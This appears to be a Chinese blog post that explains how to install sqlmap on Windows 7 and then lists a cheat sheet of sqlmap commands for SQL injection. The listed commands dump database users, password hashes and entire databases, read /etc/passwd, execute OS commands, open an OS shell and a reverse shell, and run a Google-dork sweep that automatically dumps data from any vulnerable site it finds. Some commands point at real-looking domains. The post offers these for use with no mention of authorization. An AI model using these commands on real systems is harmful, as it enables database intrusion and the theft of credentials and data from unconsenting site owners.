欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Windows Seven上安装运行SqlMap神器图文过程

程序员文章站 2022-07-04 11:38:52
00×0、 在Windows Seven Professional Edition上安装和运行SqlMap的步骤 00×1、首先下载SqlMap ...
00×0、 在Windows Seven Professional Edition上安装和运行SqlMap的步骤

00×1、首先下载SqlMap 官网下载地址

00×2、其次下载用于Windows系统Python官网下载地址

 

00×3、然后安装Python,Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住安装路径)我安装的是F:\Python27)

00×4、解压你下载好的SqlMap.zip里面的文件

00×5、找到你安装python的目录(对于我来说:F:\Python27)

00×6、现在,在python文件夹中创建一个新的文件夹,并命名为“SqlMap”


 

00×7、然后把你刚才解压的SqlMap中的文件全部复制到F:\Python27\sqlmap文件夹里面

00×8、最后在桌面空白处右键创建一个新的快捷方式:并命名为“Sqlmap”

00×9、点击刚才创建好的Sqlmap快捷方式右键—在目标栏输入:%windir%\system32\cmd.exe,起始位置输入你安装的路径:F:\Python27\SqlMap

 

 

 

创建好之后,运行你刚才创建的SqlMap快捷方式 这样就可以在Windows Seven运行SqlMap神器了。

执行命令:sqlmap.py -help

 

 

00×10、如果你输入命令提示出错:

这个原因是sqlmap开发基于python2.5平台。。所以把sqlmap运行在python2.7以下的版本既可解决

python sqlmap/sqlmap.py

File “sqlmap/sqlmap.py”, line 92

except exceptionsTuple

SyntaxError: invalid syntax

windows环境sqlmap使用命令

 

******************基本步骤***************

sqlmap.py -u “http://localhost?id=1″ –level=3 –smart –dbms “Mysql” –current-user #获取当前用户名称

sqlmap.py -u “http:// www.2cto.com /news?id=1″ –level=3 –smart –dbms “Mysql” –current-db  #获取当前数据库名称

sqlmap.py -u “http://www.xxoo.com/news?id=1″ –level=3 –smart –dbms “Mysql”–tables  -D “db_name” #列表名

sqlmap.py -u “http://localhost?id=1″ –level=3 –smart  –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #列字段

sqlmap.py -u “http://localhost?id=1″ –level=3 –smart –dbms “Mysql”  –dump  -C “column_name”  -T “table_name” -D “db_name” -v 0   #获取字段内容

******************信息获取******************

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –users  #列数据库用户

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –dbs#列数据库

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–passwords #数据库用户密码

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–passwords-U root  -v 0 #列出指定用户数据库密码

sqlmap.py -u “http://localhost?id=1″  –dbms “Mysql”  –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20  #列出指定字段,列出20条

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –dump-all -v 0 #列出所有数据库所有表

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–privileges #查看权限

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–privileges -U root #查看指定用户权限

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –is-dba -v 1 #是否是数据库管理员

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –roles #枚举数据库用户角色

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–udf-inject #导入用户自定义函数(获取系统权限!)

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–dump-all –exclude-sysdbs -v 0 #列出当前库所有表

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–union-cols #union 查询表记录

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–cookie “COOKIE_VALUE” #cookie注入

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”-b #获取banner信息

sqlmap.py -u “http://localhost?id=1″ –data “id=3″  #post注入

sqlmap.py -u “http://localhost?id=1″ –level=3 –smart-v 1 -f #指纹判别数据库类型

sqlmap.py -u “http://localhost?id=1″ –level=3 –smart–proxy”http://127.0.0.1:8118″ #代理注入

sqlmap.py -u “http://localhost?id=1″–string”STRING_ON_TRUE_PAGE”  #指定关键词

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–sql-shell #执行指定sql命令

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–file /etc/passwd

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–os-shell #系统交互shell

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–os-pwn #反弹shell

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql”–reg-read #读取win系统注册表

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –dbs-o “sqlmap.log” #保存进度

sqlmap.py -u “http://localhost?id=1″–level=3 –smart –dbms “Mysql” –dbs  -o “sqlmap.log” –resume  #恢复已保存进度

sqlmap -g “google语法” –dump-all –batch  #google搜索注入点自动 跑出所有字段

PS:毕竟是linux上的注入神器,在windows环境中运行,难免不会出错,这应该算是很正常了,建议还是回到linux环境,体验哪*,免费,开放的感觉吧..